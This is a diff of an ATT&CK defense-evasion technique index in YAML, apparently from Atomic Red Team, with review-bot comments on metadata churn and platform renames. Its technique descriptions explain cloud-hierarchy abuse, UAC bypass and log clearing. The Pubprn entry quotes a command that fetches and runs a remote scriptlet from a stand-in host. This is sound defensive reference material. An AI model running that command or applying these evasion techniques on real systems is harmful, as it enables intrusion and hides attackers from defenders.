+ url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+ - source_name: PAM Backdoor
+ description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+ 25, 2020.
+ url: https://github.com/zephrax/linux-pam-backdoor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.003
atomic_tests: []
T1578.004:
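Review bot: the substantive changes buried in the reorder are that `x_mitre_permissions_required: root` is dropped with nothing replacing it, `revoked: false` and `x_mitre_deprecated: false` are added, the external references swap `description`/`url` order, and the version moves to 2.1 with spec 3.2.0. Note that T1578.004 immediately below keeps its `x_mitre_permissions_required: User` line, so the removal is not applied uniformly across the file; confirm it reflects the upstream object rather than a generator quirk.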
@@ -518,7 +537,7 @@ defense-evasion:
url: https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots
description: Google. (2019, October 7). Restoring and deleting persistent
disk snapshots. Retrieved October 8, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-03-08T10:33:02.128Z'
name: Revert Cloud Instance
description: |-
An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.
@@ -545,8 +564,6 @@ defense-evasion:
- 'Instance: Instance Modification'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1564.012:
technique:
@@ -588,7 +605,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1222.002:
technique:
@@ -666,7 +682,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1222.002
atomic_tests:
- name: chmod - Change file or folder mode (numeric mode)
@@ -976,7 +991,7 @@ defense-evasion:
Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second script:
parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct
. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.
In later versions of Windows (10+), PubPrn.vbs
has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://
, vice the script:
moniker which could be used to reference remote code via HTTP(S).
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-18T14:55:35.817Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Signed Script Proxy Execution: Pubprn'
x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
@@ -995,7 +1010,6 @@ defense-evasion:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1216.001
atomic_tests: []
T1574.007:
@@ -1085,7 +1099,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1006:
technique:
@@ -1143,12 +1156,87 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1006
atomic_tests: []
+ T1666:
+ technique:
+ modified: '2024-09-25T16:15:41.224Z'
+ name: Modify Cloud Resource Hierarchy
+ description: "Adversaries may attempt to modify hierarchical structures in infrastructure-as-a-service
+ (IaaS) environments in order to evade defenses. \n\nIaaS environments often
+ group resources into a hierarchy, enabling improved resource management and
+ application of policies to relevant groups. Hierarchical structures differ
+ among cloud providers. For example, in AWS environments, multiple accounts
+ can be grouped under a single organization, while in Azure environments, multiple
+ subscriptions can be grouped under a single management group.(Citation: AWS
+ Organizations)(Citation: Microsoft Azure Resources)\n\nAdversaries may add,
+ delete, or otherwise modify resource groups within an IaaS hierarchy. For
+ example, in Azure environments, an adversary who has gained access to a Global
+ Administrator account may create new subscriptions in which to deploy resources.
+ They may also engage in subscription hijacking by transferring an existing
+ pay-as-you-go subscription from a victim tenant to an adversary-controlled
+ tenant. This will allow the adversary to use the victim’s compute resources
+ without generating logs on the victim tenant.(Citation: Microsoft Peach Sandstorm
+ 2023)(Citation: Microsoft Subscription Hijacking 2022)\n\nIn AWS environments,
+ adversaries with appropriate permissions in a given account may call the `LeaveOrganization`
+ API, causing the account to be severed from the AWS Organization to which
+ it was tied and removing any Service Control Policies, guardrails, or restrictions
+ imposed upon it by its former Organization. Alternatively, adversaries may
+ call the `CreateAccount` API in order to create a new account within an AWS
+ Organization. This account will use the same payment methods registered to
+ the payment account but may not be subject to existing detections or Service
+ Control Policies.(Citation: AWS RE:Inforce Threat Detection 2024)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Modification'
+ type: attack-pattern
+ id: attack-pattern--0ce73446-8722-4086-9d43-514f1d0f669e
+ created: '2024-09-25T14:16:19.234Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1666
+ external_id: T1666
+ - source_name: AWS Organizations
+ description: AWS. (n.d.). Terminology and concepts for AWS Organizations.
+ Retrieved September 25, 2024.
+ url: https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+ - source_name: Microsoft Subscription Hijacking 2022
+ description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
+ using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
+ url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
+ - source_name: Microsoft Azure Resources
+ description: Microsoft Azure. (2024, May 31). Organize your Azure resources
+ effectively. Retrieved September 25, 2024.
+ url: https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-setup-guide/organize-resources
+ - source_name: Microsoft Peach Sandstorm 2023
+ description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
+ password spray campaigns enable intelligence collection at high-value targets.
+ Retrieved September 18, 2023.
+ url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1564.008:
technique:
- modified: '2023-10-16T16:41:53.957Z'
+ modified: '2024-10-15T15:56:27.592Z'
name: 'Hide Artifacts: Email Hiding Rules'
description: |-
Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the New-InboxRule
or Set-InboxRule
[PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)
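Review bot: the new T1666 entry is IaaS-only (`x_mitre_platforms: - IaaS`) yet lands in macos-index.yaml, and it carries an empty `x_mitre_detection` and `atomic_tests: []`. That is consistent with the IaaS-only T1578 and T1578.004 entries already present in this file, so the index evidently is not platform-filtered; if that is by design, fine, but it is worth confirming since the file name suggests otherwise. The `LeaveOrganization` and `CreateAccount` calls named in the description are good candidates for the detection field that is currently blank.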
@@ -1174,11 +1262,10 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
@@ -1223,12 +1310,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.008
atomic_tests: []
T1027.013:
technique:
- modified: '2024-04-19T04:03:07.164Z'
+ modified: '2024-10-15T16:32:45.108Z'
name: Encrypted/Encoded File
description: "Adversaries may encrypt or encode files to obfuscate strings,
bytes, and other specific patterns to impede detection. Encrypting and/or
@@ -1299,11 +1385,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1014:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:50.568Z'
name: Rootkit
description: "Adversaries may use rootkits to hide the presence of programs,
files, network connections, services, drivers, and other system components.
@@ -1371,7 +1456,6 @@ defense-evasion:
url: https://en.wikipedia.org/wiki/Rootkit
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1014
atomic_tests: []
T1036.007:
@@ -1402,7 +1486,7 @@ defense-evasion:
url: https://www.seqrite.com/blog/how-to-avoid-dual-attack-and-vulnerable-files-with-double-extension/
description: Seqrite. (n.d.). How to avoid dual attack and vulnerable files
with double extension?. Retrieved July 27, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-14T21:09:59.588Z'
name: 'Masquerading: Double File Extension'
description: "Adversaries may abuse a double extension in the filename as a
means of masquerading the true file type. A file name may include a secondary
@@ -1439,13 +1523,11 @@ defense-evasion:
x_mitre_data_sources:
- 'File: File Creation'
- 'File: File Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1036.007
atomic_tests: []
T1548.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:35:39.112Z'
name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
description: |-
Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
@@ -1546,7 +1628,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.002
atomic_tests: []
T1548.003:
@@ -1577,7 +1658,7 @@ defense-evasion:
description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
Does. Retrieved March 19, 2018.
source_name: cybereason osx proton
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-14T16:28:19.781Z'
name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
description: |-
Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -1611,8 +1692,6 @@ defense-evasion:
- User
x_mitre_effective_permissions:
- root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1548.003
atomic_tests:
- name: Sudo usage
@@ -1660,7 +1739,7 @@ defense-evasion:
sudo visudo -c -f /etc/sudoers
T1578:
technique:
- modified: '2023-09-05T20:45:22.041Z'
+ modified: '2024-09-30T13:28:37.414Z'
name: Modify Cloud Compute Infrastructure
description: |-
An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.
@@ -1712,12 +1791,11 @@ defense-evasion:
- source_name: Mandiant M-Trends 2020
description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
2020.
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1542.001:
technique:
@@ -1797,12 +1875,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1542.001
atomic_tests: []
T1574.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T19:42:48.016Z'
name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
description: |-
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -1821,7 +1898,6 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Matthew Demaske, Adaptforward
@@ -1835,7 +1911,6 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -1862,8 +1937,8 @@ defense-evasion:
external_id: T1574.011
- source_name: Tweet Registry Perms Weakness
description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
- April 9, 2018."
- url: https://twitter.com/r0wdy_/status/936365549553991680
+ September 12, 2024."
+ url: https://x.com/r0wdy_/status/936365549553991680
- source_name: insecure_reg_perms
description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -1894,7 +1969,8 @@ defense-evasion:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.011
atomic_tests: []
T1542.003:
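Review bot: this hunk re-adds `x_mitre_attack_spec_version` (now 3.2.0) and `x_mitre_modified_by_ref` at the bottom of T1574.011 after the two preceding hunks removed the same keys from the top of the object, so a single version bump appears as three hunks. Have the generator emit technique keys in a fixed order (an explicit key list, or a sorted dump) so upstream key reorders do not show up as churn; the T1556.002 and T1202 blocks below suffer from the same problem and are close to unreviewable as a result.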
@@ -1951,7 +2027,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1218.013:
technique:
@@ -2004,7 +2079,7 @@ defense-evasion:
PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER). This command would
inject an import table entry consisting of the specified DLL into the module
at the given base address.(Citation: Mavinject Functionality Deconstructed)"
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T17:35:08.315Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Mavinject
x_mitre_detection: |-
@@ -2020,11 +2095,10 @@ defense-evasion:
- 'Process: Process Creation'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.005:
technique:
- modified: '2023-09-14T21:12:48.409Z'
+ modified: '2024-09-12T19:30:45.064Z'
name: 'Masquerading: Match Legitimate Name or Location'
description: |-
Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.
@@ -2070,8 +2144,8 @@ defense-evasion:
external_id: T1036.005
- source_name: Twitter ItsReallyNick Masquerading Update
description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
- Retrieved April 22, 2019.
- url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/1055321652777619457
- source_name: Docker Images
description: Docker. (n.d.). Docker Images. Retrieved April 6, 2021.
url: https://docs.docker.com/engine/reference/commandline/images/
@@ -2081,9 +2155,8 @@ defense-evasion:
url: https://www.elastic.co/blog/how-hunt-masquerade-ball
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036.005
atomic_tests:
- name: Execute a process from a directory masquerading as the current parent
@@ -2135,7 +2208,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T22:37:49.258Z'
name: Weaken Encryption
description: |-
Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)
@@ -2159,8 +2232,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1036.008:
technique:
@@ -2224,11 +2295,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564:
technique:
- modified: '2024-03-29T17:45:48.126Z'
+ modified: '2024-10-15T15:58:49.815Z'
name: Hide Artifacts
description: |-
Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)
@@ -2249,8 +2319,8 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Metadata'
- 'Application Log: Application Log Content'
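Review bot: the platform rename `Office 365` to `Office Suite` (with the matching `x_mitre_version` bump to 1.3) will silently drop T1564 from any per-platform index that still selects on the literal string `Office 365`, rather than misfile it. Check that the platform-to-index mapping used to build the per-platform CSV indexes knows the new name, and regenerate those indexes in the same change so they do not go out of step with this file.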
@@ -2294,12 +2364,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564
atomic_tests: []
T1484.002:
technique:
- modified: '2024-04-19T04:27:51.388Z'
+ modified: '2024-09-25T13:50:11.593Z'
name: Domain Trust Modification
description: "Adversaries may add new domain trusts, modify the properties of
existing domain trusts, or otherwise change the configuration of trust relationships
@@ -2319,9 +2388,14 @@ defense-evasion:
trust modifications such as altering the claim issuance rules to log in any
valid set of credentials as a specified user.(Citation: AADInternals zure
AD Federated Domain) \n\nAn adversary may also add a new federated identity
- provider to an identity tenant such as Okta, which may enable the adversary
- to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
- 2023)"
+ provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+ may enable the adversary to authenticate as any user of the tenant.(Citation:
+ Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+ gain broad access into a variety of cloud-based services that leverage the
+ identity tenant. For example, in AWS environments, an adversary that creates
+ a new identity provider for an AWS Organization will be able to federate into
+ all of the AWS Organization member accounts without creating identities for
+ each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
@@ -2341,9 +2415,8 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '2.0'
+ - Identity Provider
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
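Review bot: `Azure AD` and `SaaS` collapse into a single new platform value, `Identity Provider`, for T1484.002. Any index or filter keyed on `Azure AD` loses this technique outright, and nothing picks it up unless the platform mapping is taught the new value. Please verify the generator recognizes `Identity Provider` before merging; together with `Office Suite` in the T1564 hunk above, that is two platform names in this patch that did not exist in the previous version of the file.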
@@ -2360,6 +2433,10 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1484/002
external_id: T1484.002
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
- source_name: CISA SolarWinds Cloud Detection
description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
in Microsoft Cloud Environments. Retrieved January 8, 2021.
@@ -2393,7 +2470,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.002
atomic_tests: []
T1562.009:
@@ -2443,7 +2519,7 @@ defense-evasion:
url: https://docs.microsoft.com/windows-server/administration/windows-commands/bootcfg
description: Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August
30, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-31T14:51:47.352Z'
name: 'Impair Defenses: Safe Boot Mode'
description: |-
Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)
@@ -2471,8 +2547,6 @@ defense-evasion:
- Anti-virus
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1562.009
atomic_tests: []
T1542.005:
@@ -2515,7 +2589,7 @@ defense-evasion:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
Information. Retrieved October 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T16:35:53.806Z'
name: TFTP Boot
description: |-
Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -2539,12 +2613,10 @@ defense-evasion:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1497.001:
technique:
- modified: '2024-04-19T12:49:40.919Z'
+ modified: '2024-09-12T15:50:18.047Z'
name: 'Virtualization/Sandbox Evasion: System Checks'
description: "Adversaries may employ various system checks to detect and avoid
virtualization and analysis environments. This may include changing behaviors
@@ -2634,13 +2706,12 @@ defense-evasion:
url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
- source_name: Deloitte Environment Awareness
description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1497.001
atomic_tests:
- name: Detect Virtualization Environment (MacOS)
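Review bot: the Deloitte "Environment Awareness" reference now points at a Google Drive URL ending in `/edit`, which is the editor view rather than the plain file link the old URL was, and it carries a September 2024 retrieval date. Verify the new link opens without a Google login; if it does not, the fix belongs upstream with ATT&CK rather than a hand edit here, since this file mirrors the upstream reference verbatim.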
@@ -2681,7 +2752,7 @@ defense-evasion:
url: https://www.eurovps.com/blog/important-linux-log-files-you-must-be-monitoring/
description: Marcel. (2018, April 19). 12 Critical Linux Log Files You Must
be Monitoring. Retrieved March 29, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-29T21:23:51.886Z'
name: 'Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs'
description: |
Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the /var/log/
directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)
@@ -2706,8 +2777,6 @@ defense-evasion:
- 'File: File Deletion'
- 'File: File Modification'
- 'Command: Command Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1070.002
atomic_tests:
- name: rm -rf
@@ -3079,7 +3148,7 @@ defense-evasion:
- source_name: LOLBAS Installutil
url: https://lolbas-project.github.io/lolbas/Binaries/Installutil/
description: LOLBAS. (n.d.). Installutil.exe. Retrieved July 31, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:47:52.603Z'
name: 'Signed Binary Proxy Execution: InstallUtil'
description: |-
Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\Windows\Microsoft.NET\Framework\v\InstallUtil.exe
and C:\Windows\Microsoft.NET\Framework64\v\InstallUtil.exe
.
@@ -3105,8 +3174,6 @@ defense-evasion:
- Application control
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.004
atomic_tests: []
T1027.008:
@@ -3158,18 +3225,17 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.001:
technique:
- modified: '2024-04-18T22:54:54.668Z'
+ modified: '2024-09-30T17:32:59.948Z'
name: 'Hijack Execution Flow: DLL Search Order Hijacking'
description: |-
